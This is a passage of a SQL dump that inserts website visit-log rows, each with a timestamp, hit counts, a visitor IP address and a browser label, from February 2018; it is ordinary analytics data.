'178.154.200.7','other'),(207546,1518623660,1,1,0,0,'213.180.203.40','other'),(207547,1518624432,1,1,0,0,'66.249.64.14','chrome'),(207548,1518624625,1,1,0,0,'217.69.136.209','other'),(207549,1518625609,2,2,0,0,'54.82.97.27','other'),(207550,1518625868,1,1,0,0,'157.55.39.88','other'),(207551,1518625985,3,3,0,0,'212.113.43.58','chrome'),(207552,1518626037,1,1,0,0,'188.230.43.254','other'),(207553,1518627135,1,1,0,0,'217.69.133.191','other'),(207554,1518627510,1,1,0,0,'217.69.133.59','other'),(207555,1518628163,1,1,0,0,'178.154.171.88','other'),(207556,1518628400,1,0,1,0,'66.249.64.67',''),(207557,1518628437,1,1,0,0,'188.230.43.254','other'),(207558,1518628504,2,2,0,0,'54.82.97.27','other'),(207559,1518628929,1,1,0,0,'66.249.64.15','chrome'),(207560,1518629431,1,1,0,0,'141.8.132.19','other'),(207561,1518629483,1,1,0,0,'37.9.113.138','other'),(207562,1518630838,1,1,0,0,'188.230.43.254','other'),(207563,1518631438,1,0,1,0,'66.249.64.73',''),(207564,1518631805,1,0,1,0,'66.249.64.67',''),(207565,1518631873,1,1,0,0,'37.9.113.132','other'),(207566,1518632922,1,1,0,0,'178.154.200.32','other'),(207567,1518633759,1,1,0,0,'8.29.198.26','other'),(207568,1518634547,1,1,0,0,'91.196.178.131','chrome'),(207569,1518635039,1,1,0,0,'91.196.178.81','other'),(207570,1518635515,1,1,0,0,'178.154.171.88','other'),(207571,1518635531,1,1,0,0,'207.46.13.171','other'),(207572,1518636774,1,0,1,0,'66.249.64.67',''),(207573,1518637485,1,0,1,0,'66.249.64.15',''),(207574,1518637599,1,1,0,0,'178.154.171.10','other'),(207575,1518637703,1,1,0,0,'217.69.133.224','other'),(207576,1518637716,2,2,0,0,'54.167.40.159','other'),(207577,1518637730,1,1,0,0,'178.154.171.81','other'),(207578,1518639435,1,1,0,0,'37.9.113.60','other'),(207579,1518639574,1,1,0,0,'95.133.193.171','chrome'),(207580,1518639734,1,1,0,0,'157.55.39.88','other'),(207581,1518639737,1,1,0,0,'178.154.171.81','other'),(207582,1518640416,1,0,1,0,'66.249.64.67',''),(207583,1518640620,1,0,1,0,'66.249.64.73',''),(207584,1518640638,2,2,0,0,'54.167.40.159','other'),(207585,1518640785,1,1,0,0,'54.36.148.99','other'),(207586,1518640806,1,0,1,0,'66.249.64.71',''),(207587,1518640872,1,1,0,0,'87.250.224.46','other'),(207588,1518640920,1,1,0,0,'54.36.148.74','other'),(207589,1518641255,1,1,0,0,'5.255.253.35','other'),(207590,1518641312,1,1,0,0,'54.36.149.25','other'),(207591,1518641347,1,1,0,0,'54.36.148.42','other'),(207592,1518641359,1,1,0,0,'207.46.13.168','other'),(207593,1518641666,1,1,0,0,'54.36.148.196','other'),(207594,1518641708,1,1,0,0,'54.36.149.92','other'),(207595,1518641840,1,1,0,0,'54.36.148.199','other'),(207596,1518642067,1,1,0,0,'54.36.148.28','other'),(207597,1518642462,1,1,0,0,'54.36.149.21','other'),(207598,1518642497,1,1,0,0,'54.36.148.44','other'),(207599,1518642630,1,1,0,0,'54.36.149.72','other'),(207600,1518642675,1,0,1,0,'66.249.64.13',''),(207601,1518642703,1,1,0,0,'54.36.148.214','other'),(207602,1518642823,1,1,0,0,'54.36.148.23','other'),(207603,1518642891,1,0,1,0,'66.249.64.73',''),(207604,1518643119,1,1,0,0,'141.8.142.96','other'),(207605,1518643221,1,1,0,0,'137.74.207.109','other'),(207606,1518643247,1,1,0,0,'87.250.224.46','other'),(207607,1518643287,1,1,0,0,'54.36.148.174','other'),(207608,1518643634,1,1,0,0,'54.36.148.10','other'),(207609,1518643683,1,1,0,0,'54.36.148.117','other'),(207610,1518643885,2,2,0,0,'54.167.40.159','other'),(207611,1518644111,1,1,0,0,'54.36.149.80','other'),(207612,1518644126,1,0,1,0,'66.249.64.71',''),(207613,1518644188,1,1,0,0,'188.130.176.3','chrome'),(207614,1518644194,1,1,0,0,'54.36.148.44','other'),(207615,1518644599,1,1,0,0,'8.29.198.27','other'),(207616,1518644843,2,2,0,0,'54.167.40.159','other'),(207617,1518645092,1,1,0,0,'217.69.133.225','other'),(207618,1518645235,2,2,0,0,'54.36.149.107','other'),(207619,1518645241,1,1,0,0,'37.9.113.132','other'),(207620,1518645245,1,1,0,0,'141.8.142.29','other'),(207621,1518645346,1,1,0,0,'54.36.149.17','other'),(207622,1518645631,1,1,0,0,'151.80.27.116','other'),(207623,1518645724,1,1,0,0,'54.36.149.188','other'),(207624,1518645752,1,1,0,0,'66.249.64.71','chrome'),(207625,1518646149,1,1,0,0,'54.167.40.159','other'),(207626,1518646263,1,1,0,0,'54.36.148.104','other'),(207627,1518646422,1,1,0,0,'157.55.39.235','other'),(207628,1518647016,1,1,0,0,'54.36.148.210','other'),(207629,1518647084,1,1,0,0,'54.36.148.180','other'),(207630,1518647091,1,1,0,0,'54.36.148.42','other'),(207631,1518647157,1,1,0,0,'54.36.148.195','other'),(207632,1518647248,2,2,0,0,'54.167.40.159','other'),(207633,1518647298,1,1,0,0,'54.36.149.7','other'),(207634,1518647327,1,1,0,0,'54.36.148.16','other'),(207635,1518647338,1,1,0,0,'54.36.148.72','other'),(207636,1518647369,1,1,0,0,'54.36.148.182','other'),(207637,1518647391,1,1,0,0,'66.249.64.14','chrome'),(207638,1518647451,1,1,0,0,'213.180.203.40','other'),(207639,1518647488,1,1,0,0,'54.36.149.102','other'),(207640,1518647655,1,1,0,0,'54.36.148.34','other'),(207641,1518647727,1,1,0,0,'54.36.148.40','other'),(207642,1518647739,1,1,0,0,'54.36.148.161','other'),(207643,1518647814,1,1,0,0,'37.9.113.115','other'),(207644,1518647820,1,1,0,0,'54.36.149.50','other'),(207645,1518647854,1,1,0,0,'54.36.149.68','other'),(207646,1518648060,1,0,1,0,'66.249.64.67',''),(207647,1518648109,1,1,0,0,'54.36.148.175','other'),(207648,1518648225,1,1,0,0,'164.132.162.159','other'),(207649,1518648502,2,2,0,0,'54.165.59.7','other'),(207650,1518648678,1,1,0,0,'93.180.179.71','chrome'),(207651,1518648847,1,1,0,0,'54.36.149.40','other'),(207652,1518649181,1,1,0,0,'54.167.40.159','other'),(207653,1518649409,2,2,0,0,'54.165.59.7','other'),(207654,1518649432,1,0,1,0,'66.249.64.73',''),(207655,1518649599,1,1,0,0,'54.36.148.14','other'),(207656,1518649797,1,1,0,0,'54.36.149.88','other'),(207657,1518649870,1,1,0,0,'54.36.148.135','other'),(207658,1518650021,2,2,0,0,'54.36.148.73','other'),(207659,1518650122,1,1,0,0,'54.36.148.162','other'),(207660,1518650134,1,0,1,0,'66.249.64.13',''),(207661,1518650294,4,4,0,0,'198.204.243.138','other'),(207662,1518650348,1,1,0,0,'54.36.148.102','other'),(207663,1518650431,1,1,0,0,'54.36.148.189','other'),(207664,1518650731,1,1,0,0,'54.36.148.180','other'),(207665,1518650969,1,1,0,0,'217.69.133.14','other'),(207666,1518651059,1,1,0,0,'54.36.148.158','other'),(207667,1518651068,1,0,1,0,'66.249.64.15',''),(207668,1518651971,1,1,0,0,'54.36.148.58','other'),(207669,1518651994,1,1,0,0,'54.36.148.142','other'),(207670,1518651997,1,1,0,0,'54.36.148.181','other'),(207671,1518652044,1,1,0,0,'54.36.148.19','other'),(207672,1518652046,1,0,1,0,'66.249.64.73',''),(207673,1518652122,1,1,0,0,'54.36.148.209','other'),(207674,1518652182,1,1,0,0,'54.36.148.161','other'),(207675,1518652209,1,1,0,0,'54.36.148.165','other'),(207676,1518652247,1,1,0,0,'54.36.148.95','other'),(207677,1518652468,1,1,0,0,'157.55.39.235','other'),(207678,1518652473,1,1,0,0,'54.36.148.170','other'),(207679,1518652515,1,1,0,0,'54.36.149.20','other'),(207680,1518652564,1,1,0,0,'54.36.148.53','other'),(207681,1518652715,1,1,0,0,'151.80.27.118','other'),(207682,1518652990,6,6,0,0,'54.167.40.159','other'),(207683,1518653047,1,1,0,0,'66.249.64.73','chrome'),(207684,1518653223,1,1,0,0,'217.69.133.238','other'),(207685,1518653586,1,1,0,0,'157.55.39.235','other'),(207686,1518653743,1,1,0,0,'54.36.148.41','other'),(207687,1518653867,1,1,0,0,'54.36.148.25','other'),(207688,1518653963,1,1,0,0,'141.8.142.74','other'),(207689,1518654176,1,1,0,0,'5.45.207.83','other'),(207690,1518654342,1,1,0,0,'164.132.162.164','other'),(207691,1518654549,1,1,0,0,'54.36.149.4','other'),(207692,1518654575,1,1,0,0,'54.36.149.18','other'),(207693,1518654576,1,1,0,0,'217.69.133.70','other'),(207694,1518654854,1,1,0,0,'207.46.13.168','other'),(207695,1518654899,1,1,0,0,'54.36.148.168','other'),(207696,1518654954,2,0,2,0,'66.249.64.71',''),(207697,1518655040,1,1,0,0,'54.36.149.10','other'),(207698,1518655207,1,1,0,0,'180.76.15.24','other'),(207699,1518655250,1,1,0,0,'54.36.149.85','other'),(207700,1518655289,1,1,0,0,'54.36.148.29','other'),(207701,1518655412,1,1,0,0,'54.167.40.159','other'),(207702,1518655439,1,1,0,0,'8.29.198.25','other'),(207703,1518655506,1,0,1,0,'66.249.64.67',''),(207704,1518655802,1,1,0,0,'66.249.64.14','chrome'),(207705,1518656113,1,1,0,0,'37.112.39.66','chrome'),(207706,1518656697,3,3,0,0,'54.167.40.159','other'),(207707,1518657346,1,1,0,0,'54.36.148.240','other'),(207708,1518657494,1,1,0,0,'54.36.148.82','other'),(207709,1518657627,4,4,0,0,'75.134.141.72','other'),(207710,1518657685,6,6,0,0,'204.12.226.26','other'),(207711,1518658146,1,1,0,0,'87.250.224.46','other'),(207712,1518658252,2,2,0,0,'54.167.40.159','other'),(207713,1518658352,1,1,0,0,'157.55.39.235','other'),(207714,1518658547,1,1,0,0,'54.36.148.249','other'),(207715,1518658608,1,0,1,0,'66.249.64.67',''),(207716,1518658635,1,1,0,0,'54.36.148.246','other'),(207717,1518658840,1,0,1,0,'66.249.64.73',''),(207718,1518658884,1,1,0,0,'66.249.64.67','chrome'),(207719,1518659111,1,1,0,0,'54.165.59.7','other'),(207720,1518659260,1,1,0,0,'54.36.148.220','other'),(207721,1518659306,1,1,0,0,'54.167.40.159','other'),(207722,1518659617,1,1,0,0,'54.36.148.180','other'),(207723,1518659961,1,1,0,0,'51.255.71.100','other'),(207724,1518660086,1,0,1,0,'66.249.64.14',''),(207725,1518660178,1,1,0,0,'54.36.148.132','other'),(207726,1518660184,1,1,0,0,'66.249.64.14','chrome'),(207727,1518660248,1,1,0,0,'37.9.113.207','other'),(207728,1518660478,1,1,0,0,'54.36.148.168','other'),(207729,1518660957,2,2,0,0,'54.167.40.159','other'),(207730,1518661039,1,1,0,0,'141.8.142.96','other'),(207731,1518661536,1,1,0,0,'54.36.148.10','other'),(207732,1518661574,1,1,0,0,'54.36.148.71','other'),(207733,1518661957,1,1,0,0,'137.74.207.109','other'),(207734,1518662087,1,0,1,0,'66.249.64.67',''),(207735,1518662097,2,2,0,0,'54.36.148.162','other'),(207736,1518662272,1,1,0,0,'54.36.148.227','other'),(207737,1518662286,1,1,0,0,'54.36.148.134','other'),(207738,1518662496,1,1,0,0,'54.167.40.159','other'),(207739,1518662813,1,1,0,0,'54.36.148.224','other'),(207740,1518662899,1,1,0,0,'54.36.149.4','other'),(207741,1518663048,1,1,0,0,'54.36.148.36','other'),(207742,1518663177,1,1,0,0,'54.36.148.217','other'),(207743,1518663202,1,1,0,0,'66.249.64.15','chrome'),(207744,1518663287,1,1,0,0,'54.36.148.243','other'),(207745,1518663292,1,0,1,0,'66.249.64.73',''),(207746,1518663336,1,1,0,0,'54.36.148.129','other'),(207747,1518663340,1,1,0,0,'54.36.148.30','other'),(207748,1518663363,1,1,0,0,'54.36.148.22','other'),(207749,1518663598,1,1,0,0,'37.9.113.74','other'),(207750,1518663604,2,2,0,0,'54.36.148.33','other'),(207751,1518663620,1,1,0,0,'54.36.148.189','other'),(207752,1518663660,1,1,0,0,'54.36.149.77','other'),(207753,1518663661,1,1,0,0,'207.46.13.58','other'),(207754,1518663796,1,1,0,0,'66.249.64.71','chrome'),(207755,1518663941,1,1,0,0,'66.249.64.13','chrome'),(207756,1518664087,1,1,0,0,'54.167.40.159','other'),(207757,1518664269,1,1,0,0,'54.36.149.46','other'),(207758,1518664411,1,1,0,0,'54.36.149.27','other'),(207759,1518664515,1,1,0,0,'54.36.149.51','other'),(207760,1518664744,1,1,0,0,'46.161.9.39','firefox'),(207761,1518664796,1,1,0,0,'54.36.148.144','other'),(207762,1518665039,1,1,0,0,'54.36.148.47','other'),(207763,1518665052,1,1,0,0,'54.36.148.176','other'),(207764,1518665188,1,0,1,0,'66.249.64.73',''),(207765,1518665254,1,1,0,0,'54.36.149.83','other'),(207766,1518665478,1,1,0,0,'54.36.149.5','other'),(207767,1518665626,1,1,0,0,'54.36.148.171','other'),(207768,1518665667,1,1,0,0,'54.36.148.23','other'),(207769,1518665811,1,0,1,0,'66.249.64.71',''),(207770,1518666085,1,1,0,0,'207.46.13.168','other'),(207771,1518666280,1,1,0,0,'8.29.198.26','other'),(207772,1518666519,1,1,0,0,'54.36.148.45','other'),(207773,1518666616,1,1,0,0,'54.36.148.253','other'),(207774,1518666987,1,1,0,0,'54.36.149.86','other'),(207775,1518667275,1,1,0,0,'54.36.148.77','other'),(207776,1518667309,1,1,0,0,'54.36.148.145','other'),(207777,1518667426,2,2,0,0,'54.36.148.197','other'),(207778,1518667620,1,1,0,0,'54.36.148.83','other'),(207779,1518667628,1,1,0,0,'54.36.149.7','other'),(207780,1518667642,1,0,1,0,'66.249.64.67',''),(207781,1518667848,1,1,0,0,'80.248.227.208','other'),(207782,1518668146,1,1,0,0,'141.8.142.50','other'),(207783,1518668207,1,1,0,0,'54.36.148.168','other'),(207784,1518668318,13,13,0,0,'144.76.29.66','other'),(207785,1518668497,1,1,0,0,'54.36.148.171','other'),(207786,1518669141,1,1,0,0,'54.36.149.95','other'),(207787,1518669378,1,1,0,0,'54.36.148.31','other'),(207788,1518669568,1,1,0,0,'54.36.148.192','other'),(207789,1518669806,1,1,0,0,'137.74.207.109','other'),(207790,1518669836,1,1,0,0,'54.36.148.86','other'),(207791,1518669883,1,1,0,0,'54.36.148.43','other'),(207792,1518670274,1,1,0,0,'54.36.149.98','other'),(207793,1518670598,1,1,0,0,'54.36.149.101','other'),(207794,1518670938,1,0,1,0,'66.249.64.15',''),(207795,1518671271,1,1,0,0,'54.36.148.38','other'),(207796,1518671349,1,1,0,0,'54.36.148.39','other'),(207797,1518671401,1,1,0,0,'54.36.148.198','other'),(207798,1518671491,1,1,0,0,'54.36.148.125','other'),(207799,1518671504,1,0,1,0,'66.249.64.67',''),(207800,1518671634,1,1,0,0,'178.154.200.28','other'),(207801,1518671910,1,1,0,0,'207.46.13.168','other'),(207802,1518672499,1,1,0,0,'37.9.113.74','other'),(207803,1518672500,1,1,0,0,'54.36.148.150','other'),(207804,1518672716,1,1,0,0,'54.36.148.26','other'),(207805,1518672756,1,1,0,0,'54.36.148.219','other'),(207806,1518673151,1,1,0,0,'54.36.149.98','other'),(207807,1518673346,1,0,1,0,'66.249.64.67',''),(207808,1518673375,1,1,0,0,'54.36.148.130','other'),(207809,1518673530,1,0,1,0,'66.249.64.71',''),(207810,1518674249,1,1,0,0,'54.36.148.246','other'),(207811,1518674318,1,1,0,0,'54.36.149.28','other'),(207812,1518674576,1,1,0,0,'54.36.149.26','other'),(207813,1518674670,1,1,0,0,'54.36.148.158','other'),(207814,1518674738,1,1,0,0,'54.36.149.100','other'),(207815,1518674805,1,1,0,0,'193.70.34.209','chrome'),(207816,1518675102,1,0,1,0,'66.249.64.73',''),(207817,1518675201,2,2,0,0,'91.196.177.46','chrome'),(207818,1518675757,1,0,1,0,'66.249.64.67',''),(207819,1518675777,1,1,0,0,'94.178.129.198','chrome'),(207820,1518676856,2,2,0,0,'91.196.178.80','chrome'),(207821,1518676878,1,1,0,0,'66.249.64.67','chrome'),(207822,1518677044,1,0,1,0,'66.249.64.13',''),(207823,1518677123,1,1,0,0,'8.29.198.26','other'),(207824,1518677547,1,1,0,0,'54.36.149.40','other'),(207825,1518677612,1,1,0,0,'164.132.162.157','other'),(207826,1518677791,1,1,0,0,'54.36.148.121','other'),(207827,1518678065,1,1,0,0,'54.36.149.76','other'),(207828,1518678132,1,1,0,0,'54.36.148.116','other'),(207829,1518678194,1,1,0,0,'37.52.23.86','firefox'),(207830,1518678316,1,1,0,0,'54.36.149.89','other'),(207831,1518678356,1,1,0,0,'54.36.148.151','other'),(207832,1518678387,1,1,0,0,'54.36.149.81','other'),(207833,1518678402,1,1,0,0,'54.36.148.61','other'),(207834,1518678448,1,1,0,0,'54.36.148.216','other'),(207835,1518678601,1,1,0,0,'54.36.149.99','other'),(207836,1518678683,1,1,0,0,'164.132.162.164','other'),(207837,1518679259,3,3,0,0,'91.196.178.57','chrome'),(207838,1518679633,1,1,0,0,'66.249.93.204','chrome'),(207839,1518679645,1,1,0,0,'107.167.108.75','chrome'),(207840,1518679720,2,2,0,0,'195.230.119.34','chrome'),(207841,1518680300,3,0,3,0,'66.249.64.71',''),(207842,1518680317,1,0,1,0,'66.249.64.67',''),(207843,1518680691,8,8,0,0,'91.196.178.80','chrome'),(207844,1518681037,1,1,0,0,'66.249.64.15','chrome'),(207845,1518681810,4,4,0,0,'91.196.178.80','chrome'),(207846,1518682396,1,0,1,0,'66.249.64.67',''),(207847,1518682569,1,1,0,0,'66.249.64.73','chrome'),(207848,1518683203,1,1,0,0,'37.9.113.82','other'),(207849,1518683398,1,1,0,0,'95.132.7.96','firefox'),(207850,1518683430,1,1,0,0,'37.9.113.151','other'),(207851,1518683678,1,1,0,0,'194.44.104.200','chrome'),(207852,1518683917,1,1,0,0,'54.36.148.57','other'),(207853,1518683960,1,1,0,0,'54.36.148.73','other'),(207854,1518684637,1,1,0,0,'80.70.77.155','chrome'),(207855,1518684712,1,1,0,0,'54.36.148.240','other'),(207856,1518684795,1,1,0,0,'66.249.64.73','chrome'),(207857,1518684898,1,1,0,0,'54.36.148.67','other'),(207858,1518684965,2,2,0,0,'91.196.178.80','chrome'),(207859,1518684982,1,1,0,0,'54.36.148.94','other'),(207860,1518685290,2,2,0,0,'91.196.178.166','chrome'),(207861,1518685461,1,1,0,0,'54.36.148.35','other'),(207862,1518685560,1,1,0,0,'54.36.148.68','other'),(207863,1518685586,1,1,0,0,'54.36.148.56','other'),(207864,1518685912,1,1,0,0,'51.255.71.100','other'),(207865,1518685928,1,1,0,0,'54.36.148.114','other'),(207866,1518686235,1,1,0,0,'54.36.148.16','other'),(207867,1518686322,1,1,0,0,'91.196.178.166','chrome'),(207868,1518686547,1,1,0,0,'207.46.13.168','other'),(207869,1518686896,1,1,0,0,'54.36.148.99','other'),(207870,1518686933,1,1,0,0,'54.36.148.63','other'),(207871,1518687012,1,1,0,0,'66.249.64.15','chrome'),(207872,1518687142,1,1,0,0,'66.249.64.71','chrome'),(207873,1518687374,1,1,0,0,'54.36.149.84','other'),(207874,1518687405,1,1,0,0,'54.36.149.14','other'),(207875,1518687440,1,1,0,0,'54.36.148.43','other'),(207876,1518687482,1,1,0,0,'46.200.246.252','chrome'),(207877,1518687573,1,1,0,0,'178.94.35.99','firefox'),(207878,1518687636,1,1,0,0,'54.36.149.4','other'),(207879,1518687694,1,1,0,0,'54.36.148.191','other'),(207880,1518687813,1,1,0,0,'91.196.178.166','chrome'),(207881,1518687903,1,1,0,0,'207.46.13.58','other'),(207882,1518687957,1,1,0,0,'8.29.198.25','other'),(207883,1518688165,1,1,0,0,'54.36.149.95','other'),(207884,1518688176,1,1,0,0,'54.36.149.58','other'),(207885,1518688659,1,1,0,0,'54.36.148.107','other'),(207886,1518688730,7,7,0,0,'91.209.51.22','other'),(207887,1518688843,1,0,1,0,'66.249.64.67',''),(207888,1518688991,2,2,0,0,'95.132.29.10','chrome'),(207889,1518689049,1,1,0,0,'78.137.29.235','chrome'),(207890,1518689323,1,1,0,0,'54.36.148.241','other'),(207891,1518689585,1,1,0,0,'54.36.149.5','other'),(207892,1518689596,1,1,0,0,'95.108.181.111','other'),(207893,1518689681,1,1,0,0,'54.36.148.16','other'),(207894,1518689839,1,1,0,0,'54.36.148.205','other'),(207895,1518689872,1,1,0,0,'54.36.148.17','other'),(207896,1518689931,2,0,2,0,'66.249.64.67',''),(207897,1518690094,1,1,0,0,'46.175.150.92','chrome'),(207898,1518690323,1,1,0,0,'54.36.148.14','other'),(207899,1518690645,1,1,0,0,'54.36.148.215','other'),(207900,1518690745,1,1,0,0,'54.36.149.40','other'),(207901,1518690766,1,1,0,0,'54.36.148.172','other'),(207902,1518690840,1,1,0,0,'194.187.106.118','chrome'),(207903,1518690842,1,1,0,0,'54.36.148.75','other'),(207904,1518690887,1,1,0,0,'66.249.64.14','chrome'),(207905,1518690936,3,1,2,0,'66.249.64.67',''),(207906,1518691165,1,1,0,0,'54.36.148.141','other'),(207907,1518691357,2,2,0,0,'78.111.187.59','chrome'),(207908,1518691451,1,1,0,0,'54.208.102.37','other'),(207909,1518691496,1,1,0,0,'54.36.148.88','other'),(207910,1518691623,1,1,0,0,'40.77.167.92','other'),(207911,1518691700,1,1,0,0,'54.36.149.69','other'),(207912,1518691733,1,1,0,0,'37.9.113.151','other'),(207913,1518691824,2,2,0,0,'91.196.177.134','chrome'),(207914,1518691945,2,2,0,0,'91.196.178.165','chrome'),(207915,1518691948,1,0,1,0,'66.249.64.73',''),(207916,1518692005,1,1,0,0,'37.9.113.56','other'),(207917,1518692007,1,1,0,0,'95.108.213.24','other'),(207918,1518692018,1,1,0,0,'37.9.113.157','other'),(207919,1518692060,1,1,0,0,'95.133.199.144','opera'),(207920,1518692072,2,2,0,0,'91.196.178.65','chrome'),(207921,1518692105,1,0,1,0,'66.249.64.71',''),(207922,1518692260,1,1,0,0,'37.9.113.82','other'),(207923,1518692520,1,1,0,0,'54.36.148.204','other'),(207924,1518692652,1,1,0,0,'54.36.148.149','other'),(207925,1518692825,1,1,0,0,'91.196.177.134','chrome'),(207926,1518692881,1,1,0,0,'51.255.71.100','other'),(207927,1518693034,1,1,0,0,'54.36.148.192','other'),(207928,1518693205,1,1,0,0,'91.225.166.185','chrome'),(207929,1518693244,1,1,0,0,'54.36.148.217','other'),(207930,1518693341,1,1,0,0,'91.196.178.167','firefox'),(207931,1518693349,1,1,0,0,'54.36.149.87','other'),(207932,1518693366,1,1,0,0,'54.36.148.96','other'),(207933,1518693395,1,1,0,0,'54.36.149.11','other'),(207934,1518693513,1,1,0,0,'54.36.148.86','other'),(207935,1518693525,1,0,1,0,'66.249.64.73',''),(207936,1518693680,1,1,0,0,'54.36.149.60','other'),(207937,1518693804,1,1,0,0,'54.36.149.86','other'),(207938,1518693821,1,1,0,0,'54.36.148.172','other'),(207939,1518694005,1,1,0,0,'54.36.148.134','other'),(207940,1518694289,1,1,0,0,'54.36.148.122','other'),(207941,1518694340,1,1,0,0,'91.90.18.219','chrome'),(207942,1518694609,2,2,0,0,'199.58.86.211','other'),(207943,1518694626,1,1,0,0,'54.36.149.59','other'),(207944,1518694915,1,1,0,0,'54.36.148.114','other'),(207945,1518695089,1,1,0,0,'54.36.148.232','other'),(207946,1518695232,1,1,0,0,'54.36.149.66','other'),(207947,1518695856,1,1,0,0,'40.77.167.92','other'),(207948,1518695909,1,1,0,0,'217.69.133.231','other'),(207949,1518696006,1,1,0,0,'54.36.148.149','other'),(207950,1518696372,1,1,0,0,'54.36.149.105','other'),(207951,1518696507,1,1,0,0,'54.36.148.215','other'),(207952,1518696629,1,1,0,0,'54.36.149.65','other'),(207953,1518696684,1,1,0,0,'180.76.15.135','other'),(207954,1518697104,1,1,0,0,'54.36.148.24','other'),(207955,1518697123,1,1,0,0,'91.209.11.236','other'),(207956,1518697247,1,1,0,0,'54.36.148.234','other'),(207957,1518697321,1,1,0,0,'54.36.149.85','other'),(207958,1518697340,1,1,0,0,'91.196.178.65','firefox'),(207959,1518697468,1,1,0,0,'54.36.148.57','other'),(207960,1518697778,1,1,0,0,'137.74.201.108','other'),(207961,1518697790,1,1,0,0,'209.141.46.108','chrome'),(207962,1518697835,1,1,0,0,'207.46.13.171','other'),(207963,1518697885,1,1,0,0,'54.36.148.74','other'),(207964,1518698191,1,1,0,0,'54.36.148.179','other'),(207965,1518698390,1,1,0,0,'54.36.148.134','other'),(207966,1518698584,1,1,0,0,'54.36.148.182','other'),(207967,1518698591,1,1,0,0,'54.36.148.48','other'),(207968,1518698614,1,1,0,0,'137.74.207.109','other'),(207969,1518698798,1,1,0,0,'8.29.198.27','other'),(207970,1518698899,1,1,0,0,'54.36.148.79','other'),(207971,1518699037,1,1,0,0,'91.196.177.15','firefox'),(207972,1518699100,1,1,0,0,'54.36.149.65','other'),(207973,1518699176,1,1,0,0,'54.36.149.59','other'),(207974,1518699180,1,1,0,0,'54.36.148.191','other'),(207975,1518699347,1,1,0,0,'54.36.148.116','other'),(207976,1518699534,1,1,0,0,'66.249.64.14','chrome'),(207977,1518699747,1,1,0,0,'66.249.64.73','chrome'),(207978,1518699752,1,1,0,0,'51.255.71.98','other'),(207979,1518700025,2,2,0,0,'91.196.178.80','chrome'),(207980,1518700038,2,2,0,0,'54.36.149.101','other'),(207981,1518700073,1,1,0,0,'54.36.149.69','other'),(207982,1518700080,1,1,0,0,'54.36.148.11','other'),(207983,1518700173,1,1,0,0,'54.36.149.76','other'),(207984,1518700233,2,0,2,0,'66.249.64.67',''),(207985,1518700338,1,1,0,0,'54.36.149.62','other'),(207986,1518700351,2,2,0,0,'195.230.119.34','chrome'),(207987,1518700367,1,1,0,0,'87.250.224.85','other'),(207988,1518700369,1,1,0,0,'54.36.148.34','other'),(207989,1518700825,1,1,0,0,'91.196.178.6','chrome'),(207990,1518700843,1,1,0,0,'54.36.148.63','other'),(207991,1518700893,1,1,0,0,'164.132.162.164','other'),(207992,1518701381,1,1,0,0,'46.151.250.212','chrome'),(207993,1518701395,1,1,0,0,'54.36.148.217','other'),(207994,1518701497,1,1,0,0,'188.166.77.200','chrome'),(207995,1518701505,1,1,0,0,'91.196.178.104','chrome'),(207996,1518701506,1,1,0,0,'54.36.149.70','other'),(207997,1518701618,1,1,0,0,'54.36.148.239','other'),(207998,1518701652,5,5,0,0,'91.196.178.80','chrome'),(207999,1518701654,1,1,0,0,'54.36.149.16','other'),(208000,1518701664,1,1,0,0,'54.36.148.231','other'),(208001,1518701690,1,1,0,0,'91.196.178.73','firefox'),(208002,1518701730,1,1,0,0,'54.36.149.28','other'),(208003,1518701757,1,1,0,0,'95.132.7.96','firefox'),(208004,1518701991,1,1,0,0,'217.69.133.248','other'),(208005,1518702040,1,1,0,0,'54.36.149.76','other'),(208006,1518702136,1,1,0,0,'92.112.125.243','chrome'),(208007,1518702143,1,1,0,0,'54.36.148.154','other'),(208008,1518702213,1,1,0,0,'91.196.178.76','chrome'),(208009,1518702219,1,1,0,0,'54.36.148.201','other'),(208010,1518702238,1,1,0,0,'54.36.148.207','other'),(208011,1518702515,1,1,0,0,'54.36.148.93','other'),(208012,1518702557,1,1,0,0,'54.36.148.140','other'),(208013,1518702587,1,1,0,0,'164.132.162.164','other'),(208014,1518703088,1,1,0,0,'54.36.149.28','other'),(208015,1518703131,1,1,0,0,'54.36.149.2','other'),(208016,1518703182,1,1,0,0,'54.36.148.119','other'),(208017,1518703326,1,1,0,0,'54.36.148.219','other'),(208018,1518703353,1,1,0,0,'91.209.11.236','other'),(208019,1518703469,1,1,0,0,'91.196.178.166','chrome'),(208020,1518703548,1,1,0,0,'54.36.148.220','other'),(208021,1518703553,1,1,0,0,'54.36.148.229','other'),(208022,1518703592,1,1,0,0,'54.36.148.66','other'),(208023,1518703616,1,1,0,0,'54.36.148.12','other'),(208024,1518703620,1,1,0,0,'92.112.127.108','chrome'),(208025,1518703693,1,1,0,0,'94.178.19.115','chrome'),(208026,1518703896,1,1,0,0,'54.36.149.1','other'),(208027,1518703950,1,0,1,0,'66.249.64.71',''),(208028,1518704181,1,1,0,0,'54.36.149.52','other'),(208029,1518704186,1,1,0,0,'54.36.149.82','other'),(208030,1518704197,1,1,0,0,'54.36.148.31','other'),(208031,1518704271,1,1,0,0,'54.36.148.115','other'),(208032,1518704356,1,1,0,0,'54.36.148.68','other'),(208033,1518704390,2,2,0,0,'91.196.178.167','chrome'),(208034,1518704391,1,1,0,0,'54.36.148.93','other'),(208035,1518704629,1,1,0,0,'54.36.149.103','other'),(208036,1518704634,1,1,0,0,'180.76.15.27','other'),(208037,1518704836,1,1,0,0,'54.36.148.86','other'),(208038,1518704841,1,1,0,0,'54.36.148.174','other'),(208039,1518705066,1,1,0,0,'54.36.148.182','other'),(208040,1518705136,1,1,0,0,'164.132.162.164','other'),(208041,1518705264,1,1,0,0,'95.132.7.96','firefox'),(208042,1518705295,1,1,0,0,'54.36.148.80','other'),(208043,1518705316,1,1,0,0,'54.36.148.29','other'),(208044,1518705331,1,1,0,0,'95.132.9.98','chrome'),(208045,1518705401,1,1,0,0,'54.36.149.96','other'),(208046,1518705659,1,1,0,0,'54.36.148.21','other'),(208047,1518705788,1,1,0,0,'91.196.177.15','chrome'),(208048,1518705938,1,1,0,0,'54.36.148.146','other'),(208049,1518706089,1,1,0,0,'54.36.149.40','other'),(208050,1518706315,1,1,0,0,'54.36.149.16','other'),(208051,1518706353,1,1,0,0,'79.171.126.250','chrome'),(208052,1518706365,1,1,0,0,'54.36.149.15','other'),(208053,1518706405,1,1,0,0,'188.0.102.80','chrome'),(208054,1518706600,1,1,0,0,'54.36.148.173','other'),(208055,1518707093,1,1,0,0,'54.36.148.178','other'),(208056,1518707161,1,1,0,0,'54.36.149.27','other'),(208057,1518707170,1,1,0,0,'54.36.149.83','other'),(208058,1518707430,1,1,0,0,'54